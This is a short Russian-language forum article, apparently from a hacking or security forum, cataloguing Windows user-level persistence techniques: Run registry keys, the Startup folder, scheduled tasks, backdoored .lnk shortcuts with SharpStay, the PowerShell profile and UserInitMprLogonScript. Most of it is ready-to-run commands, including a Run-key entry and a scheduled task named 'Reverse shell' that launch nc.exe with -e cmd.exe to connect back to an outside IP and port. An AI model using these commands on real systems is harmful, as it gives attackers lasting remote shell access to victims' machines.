Статья Техники персистенции в пользовательском режиме: методы и инструменты

devqp

Премиум
Реестр и папка автозагрузки
Классический метод создания персистенции через автозагрузку реестра или размещение файла в стартовой папке. Пример добавления в реестр:
Код:
REG ADD HKCU\SOFTWARE\Microsoft\CurrentVersion\Run /v 1 /d "C:\Users\guest\Downloads\nc.exe -e cmd.exe IP PORT"

Путь к папке автозагрузки:
Код:
C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Планировщик задач
Создание задачи для регулярного выполнения кода:
Код:
schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr 'c:\Users\User\Downloads/nc.exe 192.168.56.103 1337 -e cmd.exe'
Инструмент ScheduleRunner для автоматизации:
Код:
ScheduleRunner.exe /method:create /taskname:Cleanup /trigger:daily /starttime:23:30 /program:calc.exe

Ядовитые ярлыки (.lnk)
Модификация целевого пути в ярлыках с использованием SharpStay:
Код:
Sharpstay.exe action=BackdoorLNK command="C:\Windows\temp\fun.exe" lnkpath="C:\users\user\desktop\Excel.lnk"

Профиль PowerShell
Добавление скрипта в профиль пользователя:
Код:
echo "whoami > c:\temp\whoami.txt" > $PROFILE

UserInitMprLogonScript
Установка пути к скрипту в реестре:
Код:
HKCU\Environment\UserInitMprLogonScript → путь_к_скрипту

Все примеры требуют прав пользовательского уровня. Для COM Hijacking и других методов потребуются привилегии администратора — тема следующего материала.